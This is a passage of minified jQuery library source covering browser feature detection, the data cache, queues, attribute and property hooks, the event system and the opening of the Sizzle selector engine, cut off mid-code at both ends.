Disabled=!l.disabled;try{delete 
d.test}catch(h){t.deleteExpando=!1}a=o.createElement("input"),a.setAttribute("value",""),t.input=""===a.getAttribute("value"),a.value="t",a.setAttribute("type","radio"),t.radioValue="t"===a.value,a.setAttribute("checked","t"),a.setAttribute("name","t"),u=o.createDocumentFragment(),u.appendChild(a),t.appendChecked=a.checked,t.checkClone=u.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;return d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip,b(function(){var n,r,a,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",u=o.getElementsByTagName("body")[0];u&&(n=o.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",u.appendChild(n).appendChild(d),d.innerHTML="<table><tr><td></td><td>t</td></tr></table>",a=d.getElementsByTagName("td"),a[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===a[0].offsetHeight,a[0].style.display="",a[1].style.display="none",t.reliableHiddenOffsets=p&&0===a[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",t.boxSizing=4===d.offsetWidth,t.doesNotIncludeMarginInBodyOffset=1!==u.offsetTop,e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(o.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).
marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="<div></div>",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(u.style.zoom=1)),u.removeChild(n),n=d=a=r=null)}),n=s=u=l=r=a=null,t}();var O=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,B=/([A-Z])/g;function P(e,n,r,i){if(b.acceptData(e)){var o,a,s=b.expando,u="string"==typeof n,l=e.nodeType,p=l?b.cache:e,f=l?e[s]:e[s]&&s;if(f&&p[f]&&(i||p[f].data)||!u||r!==t)return f||(l?e[s]=f=c.pop()||b.guid++:f=s),p[f]||(p[f]={},l||(p[f].toJSON=b.noop)),("object"==typeof n||"function"==typeof n)&&(i?p[f]=b.extend(p[f],n):p[f].data=b.extend(p[f].data,n)),o=p[f],i||(o.data||(o.data={}),o=o.data),r!==t&&(o[b.camelCase(n)]=r),u?(a=o[n],null==a&&(a=o[b.camelCase(n)])):a=o,a}}function R(e,t,n){if(b.acceptData(e)){var r,i,o,a=e.nodeType,s=a?b.cache:e,u=a?e[b.expando]:b.expando;if(s[u]){if(t&&(o=n?s[u]:s[u].data)){b.isArray(t)?t=t.concat(b.map(t,b.camelCase)):t in o?t=[t]:(t=b.camelCase(t),t=t in o?[t]:t.split(" "));for(r=0,i=t.length;i>r;r++)delete o[t[r]];if(!(n?$:b.isEmptyObject)(o))return}(n||(delete s[u].data,$(s[u])))&&(a?b.cleanData([e],!0):b.support.deleteExpando||s!=s.window?delete s[u]:s[u]=null)}}}b.extend({cache:{},expando:"jQuery"+(p+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?b.cache[e[b.expando]]:e[b.expando],!!e&&!$(e)},data:function(e,t,n){return P(e,t,n)},removeData:function(e,t){return R(e,t)},_data:function(e,t,n){return P(e,t,n,!0)},_removeData:function(e,t){return R(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&b.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),b.fn.extend({data:function(e,n){var 
r,i,o=this[0],a=0,s=null;if(e===t){if(this.length&&(s=b.data(o),1===o.nodeType&&!b._data(o,"parsedAttrs"))){for(r=o.attributes;r.length>a;a++)i=r[a].name,i.indexOf("data-")||(i=b.camelCase(i.slice(5)),W(o,i,s[i]));b._data(o,"parsedAttrs",!0)}return s}return"object"==typeof e?this.each(function(){b.data(this,e)}):b.access(this,function(n){return n===t?o?W(o,e,b.data(o,e)):null:(this.each(function(){b.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){b.removeData(this,e)})}});function W(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(B,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:O.test(r)?b.parseJSON(r):r}catch(o){}b.data(e,n,r)}else r=t}return r}function $(e){var t;for(t in e)if(("data"!==t||!b.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}b.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=b._data(e,n),r&&(!i||b.isArray(r)?i=b._data(e,n,b.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=b.queue(e,t),r=n.length,i=n.shift(),o=b._queueHooks(e,t),a=function(){b.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),o.cur=i,i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return b._data(e,n)||b._data(e,n,{empty:b.Callbacks("once memory").add(function(){b._removeData(e,t+"queue"),b._removeData(e,n)})})}}),b.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?b.queue(this[0],e):n===t?this:this.each(function(){var t=b.queue(this,e,n);b._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&b.dequeue(this,e)})},dequeue:function(e){return this.each(function(){b.dequeue(this,e)})},delay:function(e,t){return e=b.fx?b.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var 
r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=b.Deferred(),a=this,s=this.length,u=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=b._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(u));return u(),o.promise(n)}});var I,z,X=/[\t\r\n]/g,U=/\r/g,V=/^(?:input|select|textarea|button|object)$/i,Y=/^(?:a|area)$/i,J=/^(?:checked|selected|autofocus|autoplay|async|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped)$/i,G=/^(?:checked|selected)$/i,Q=b.support.getSetAttribute,K=b.support.input;b.fn.extend({attr:function(e,t){return b.access(this,b.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){b.removeAttr(this,e)})},prop:function(e,t){return b.access(this,b.prop,e,t,arguments.length>1)},removeProp:function(e){return e=b.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,u="string"==typeof e&&e;if(b.isFunction(e))return this.each(function(t){b(this).addClass(e.call(this,t,this.className))});if(u)for(t=(e||"").match(w)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(X," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=b.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,u=0===arguments.length||"string"==typeof e&&e;if(b.isFunction(e))return this.each(function(t){b(this).removeClass(e.call(this,t,this.className))});if(u)for(t=(e||"").match(w)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(X," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?b.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e,r="boolean"==typeof t;return 
b.isFunction(e)?this.each(function(n){b(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var o,a=0,s=b(this),u=t,l=e.match(w)||[];while(o=l[a++])u=r?u:!s.hasClass(o),s[u?"addClass":"removeClass"](o)}else(n===i||"boolean"===n)&&(this.className&&b._data(this,"__className__",this.className),this.className=this.className||e===!1?"":b._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(X," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=b.isFunction(e),this.each(function(n){var o,a=b(this);1===this.nodeType&&(o=i?e.call(this,n,a.val()):e,null==o?o="":"number"==typeof o?o+="":b.isArray(o)&&(o=b.map(o,function(e){return null==e?"":e+""})),r=b.valHooks[this.type]||b.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=b.valHooks[o.type]||b.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(U,""):null==n?"":n)}}}),b.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,u=0>i?s:o?i:0;for(;s>u;u++)if(n=r[u],!(!n.selected&&u!==i||(b.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&b.nodeName(n.parentNode,"optgroup"))){if(t=b(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n=b.makeArray(t);return b(e).find("option").each(function(){this.selected=b.inArray(b(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attr:function(e,n,r){var o,a,s,u=e.nodeType;if(e&&3!==u&&8!==u&&2!==u)return typeof e.getAttribute===i?b.prop(e,n,r):(a=1!==u||!b.isXMLDoc(e),a&&(n=n.toLowerCase(),o=b.attrHooks[n]||(J.test(n)?z:I)),r===t?o&&a&&"get"in 
o&&null!==(s=o.get(e,n))?s:(typeof e.getAttribute!==i&&(s=e.getAttribute(n)),null==s?t:s):null!==r?o&&a&&"set"in o&&(s=o.set(e,r,n))!==t?s:(e.setAttribute(n,r+""),r):(b.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(w);if(o&&1===e.nodeType)while(n=o[i++])r=b.propFix[n]||n,J.test(n)?!Q&&G.test(n)?e[b.camelCase("default-"+n)]=e[r]=!1:e[r]=!1:b.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!b.support.radioValue&&"radio"===t&&b.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!b.isXMLDoc(e),a&&(n=b.propFix[n]||n,o=b.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):V.test(e.nodeName)||Y.test(e.nodeName)&&e.href?0:t}}}}),z={get:function(e,n){var r=b.prop(e,n),i="boolean"==typeof r&&e.getAttribute(n),o="boolean"==typeof r?K&&Q?null!=i:G.test(n)?e[b.camelCase("default-"+n)]:!!i:e.getAttributeNode(n);return o&&o.value!==!1?n.toLowerCase():t},set:function(e,t,n){return t===!1?b.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&b.propFix[n]||n,n):e[b.camelCase("default-"+n)]=e[n]=!0,n}},K&&Q||(b.attrHooks.value={get:function(e,n){var r=e.getAttributeNode(n);return b.nodeName(e,"input")?e.defaultValue:r&&r.specified?r.value:t},set:function(e,n,r){return b.nodeName(e,"input")?(e.defaultValue=n,t):I&&I.set(e,n,r)}}),Q||(I=b.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return 
r&&("id"===n||"name"===n||"coords"===n?""!==r.value:r.specified)?r.value:t},set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},b.attrHooks.contenteditable={get:I.get,set:function(e,t,n){I.set(e,""===t?!1:t,n)}},b.each(["width","height"],function(e,n){b.attrHooks[n]=b.extend(b.attrHooks[n],{set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}})})),b.support.hrefNormalized||(b.each(["href","src","width","height"],function(e,n){b.attrHooks[n]=b.extend(b.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return null==r?t:r}})}),b.each(["href","src"],function(e,t){b.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}})),b.support.style||(b.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),b.support.optSelected||(b.propHooks.selected=b.extend(b.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),b.support.enctype||(b.propFix.enctype="encoding"),b.support.checkOn||b.each(["radio","checkbox"],function(){b.valHooks[this]={get:function(e){return null===e.getAttribute("value")?"on":e.value}}}),b.each(["radio","checkbox"],function(){b.valHooks[this]=b.extend(b.valHooks[this],{set:function(e,n){return b.isArray(n)?e.checked=b.inArray(b(e).val(),n)>=0:t}})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}b.event={global:{},add:function(e,n,r,o,a){var s,u,l,c,p,f,d,h,g,m,y,v=b._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=b.guid++),(u=v.events)||(u=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof 
b===i||e&&b.event.triggered===e.type?t:b.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(w)||[""],l=n.length;while(l--)s=rt.exec(n[l])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),p=b.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=b.event.special[g]||{},d=b.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&b.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=u[g])||(h=u[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),b.event.global[g]=!0;e=null}},remove:function(e,t,n,r,i){var o,a,s,u,l,c,p,f,d,h,g,m=b.hasData(e)&&b._data(e);if(m&&(c=m.events)){t=(t||"").match(w)||[""],l=t.length;while(l--)if(s=rt.exec(t[l])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=b.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),u=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));u&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||b.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)b.event.remove(e,d+t[l],n,r,!0);b.isEmptyObject(c)&&(delete m.handle,b._removeData(e,"events"))}},trigger:function(n,r,i,a){var s,u,l,c,p,f,d,h=[i||o],g=y.call(n,"type")?n.type:n,m=y.call(n,"namespace")?n.namespace.split("."):[];if(l=f=i=i||o,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+b.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),u=0>g.indexOf(":")&&"on"+g,n=n[b.expando]?n:new b.Event(g,"object"==typeof 
n&&n),n.isTrigger=!0,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:b.makeArray(r,[n]),p=b.event.special[g]||{},a||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!a&&!p.noBubble&&!b.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(l=l.parentNode);l;l=l.parentNode)h.push(l),f=l;f===(i.ownerDocument||o)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((l=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(b._data(l,"events")||{})[n.type]&&b._data(l,"handle"),s&&s.apply(l,r),s=u&&l[u],s&&b.acceptData(l)&&s.apply&&s.apply(l,r)===!1&&n.preventDefault();if(n.type=g,!(a||n.isDefaultPrevented()||p._default&&p._default.apply(i.ownerDocument,r)!==!1||"click"===g&&b.nodeName(i,"a")||!b.acceptData(i)||!u||!i[g]||b.isWindow(i))){f=i[u],f&&(i[u]=null),b.event.triggered=g;try{i[g]()}catch(v){}b.event.triggered=t,f&&(i[u]=f)}return n.result}},dispatch:function(e){e=b.event.fix(e);var n,r,i,o,a,s=[],u=h.call(arguments),l=(b._data(this,"events")||{})[e.type]||[],c=b.event.special[e.type]||{};if(u[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=b.event.handlers.call(this,e,l),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((b.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,u),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],u=n.delegateCount,l=e.target;if(u&&l.nodeType&&(!e.button||"click"!==e.type))for(;l!=this;l=l.parentNode||this)if(1===l.nodeType&&(l.disabled!==!0||"click"!==e.type)){for(o=[],a=0;u>a;a++)i=n[a],r=i.selector+" 
",o[r]===t&&(o[r]=i.needsContext?b(r,this).index(l)>=0:b.find(r,this,null,[l]).length),o[r]&&o.push(i);o.length&&s.push({elem:l,handlers:o})}return n.length>u&&s.push({elem:this,handlers:n.slice(u)}),s},fix:function(e){if(e[b.expando])return e;var t,n,r,i=e.type,a=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new b.Event(a),t=r.length;while(t--)n=r[t],e[n]=a[n];return e.target||(e.target=a.srcElement||o),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,a):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,a,s=n.button,u=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||o,a=i.documentElement,r=i.body,e.pageX=n.clientX+(a&&a.scrollLeft||r&&r.scrollLeft||0)-(a&&a.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(a&&a.scrollTop||r&&r.scrollTop||0)-(a&&a.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&u&&(e.relatedTarget=u===e.target?n.toElement:u),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},click:{trigger:function(){return b.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t}},focus:{trigger:function(){if(this!==o.activeElement&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return 
this===o.activeElement&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=b.extend(new b.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?b.event.trigger(i,null,t):b.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},b.removeEvent=o.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},b.Event=function(e,n){return this instanceof b.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&b.extend(this,n),this.timeStamp=e&&e.timeStamp||b.now(),this[b.expando]=!0,t):new b.Event(e,n)},b.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},b.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){b.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;
	return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubbles||(b.event.special.submit={setup:function(){return b.nodeName(this,"form")?!1:(b.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=b.nodeName(n,"input")||b.nodeName(n,"button")?n.form:t;r&&!b._data(r,"submitBubbles")&&(b.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),b._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&b.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return b.nodeName(this,"form")?!1:(b.event.remove(this,"._submit"),t)}}),b.support.changeBubbles||(b.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(b.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),b.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),b.event.simulate("change",this,e,!0)})),!1):(b.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!b._data(t,"changeBubbles")&&(b.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||b.event.simulate("change",this.parentNode,e,!0)}),b._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return b.event.remove(this,"._change"),!Z.test(this.nodeName)}}),b.support.focusinBubbles||b.each({focus:"focusin",blur:"focusout"},function(e,t){var 
n=0,r=function(e){b.event.simulate(t,e.target,b.event.fix(e),!0)};b.event.special[t]={setup:function(){0===n++&&o.addEventListener(e,r,!0)},teardown:function(){0===--n&&o.removeEventListener(e,r,!0)}}}),b.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return b().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=b.guid++)),this.each(function(){b.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,b(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){b.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){b.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?b.event.trigger(e,n,r,!0):t}}),function(e,t){var n,r,i,o,a,s,u,l,c,p,f,d,h,g,m,y,v,x="sizzle"+-new Date,w=e.document,T={},N=0,C=0,k=it(),E=it(),S=it(),A=typeof t,j=1<<31,D=[],L=D.pop,H=D.push,q=D.slice,M=D.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return 
t;return-1},_="[\\x20\\t\\r\\n\\f]",F="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=F.replace("w","w#"),B="([*^$|!~]?=)",P="\\["+_+"*("+F+")"+_+"*(?:"+B+_+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+O+")|)|)"+_+"*\\]",R=":("+F+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+P.replace(3,8)+")*)|.*)\\)|)",W=RegExp("^"+_+"+|((?:^|[^\\\\])(?:\\\\.)*)"+_+"+$","g"),$=RegExp("^"+_+"*,"+_+"*"),I=RegExp("^"+_+"*([\\x20\\t\\r\\n\\f>+~])"+_+"*"),z=RegExp(R),X=RegExp("^"+O+"$"),U={ID:RegExp("^#("+F+")"),CLASS:RegExp("^\\.("+F+")"),NAME:RegExp("^\\[name=['\"]?("+F+")['\"]?\\]"),TAG:RegExp("^("+F.replace("w","w*")+")"),ATTR:RegExp("^"+P),PSEUDO:RegExp("^"+R),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+_+"*(even|odd|(([+-]|)(\\d*)n|)"+_+"*(?:([+-]|)"+_+"*(\\d+)|))"+_+"*\\)|)","i"),needsContext:RegExp("^"+_+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+_+"*((?:-\\d)?\\d*)"+_+"*\\)|)(?=[^-]|$)","i")},V=/[\x20\t\r\n\f]*[+~]/,Y=/^[^{]+\{\s*\[native code/,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,G=/^(?:input|select|textarea|button)$/i,Q=/^h\d$/i,K=/'|\\/g,Z=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,et=/\\([\da-fA-F]{1,6}[\x20\t\r\n\f]?|.)/g,tt=function(e,t){var n="0x"+t-65536;return n!==n?t:0>n?String.fromCharCode(n+65536):String.fromCharCode(55296|n>>10,56320|1023&n)};try{q.call(w.documentElement.childNodes,0)[0].nodeType}catch(nt){q=function(e){var t,n=[];while(t=this[e++])n.push(t);return n}}function rt(e){return Y.test(e+"")}function it(){var e,t=[];return e=function(n,r){return t.push(n+=" ")>i.cacheLength&&delete e[t.shift()],e[n]=r}}function ot(e){return e[x]=!0,e}function at(e){var t=p.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}}function st(e,t,n,r){var i,o,a,s,u,l,f,g,m,v;if((t?t.ownerDocument||t:w)!==p&&c(t),t=t||p,n=n||[],!e||"string"!=typeof e)return n;if(1!==(s=t.nodeType)&&9!==s)return[];if(!d&&!r){if(i=J.exec(e))if(a=i[1]){if(9===s){if(o=t.getElementById(a),!o||!o.parentNode)return n;if(o.id===a)return 
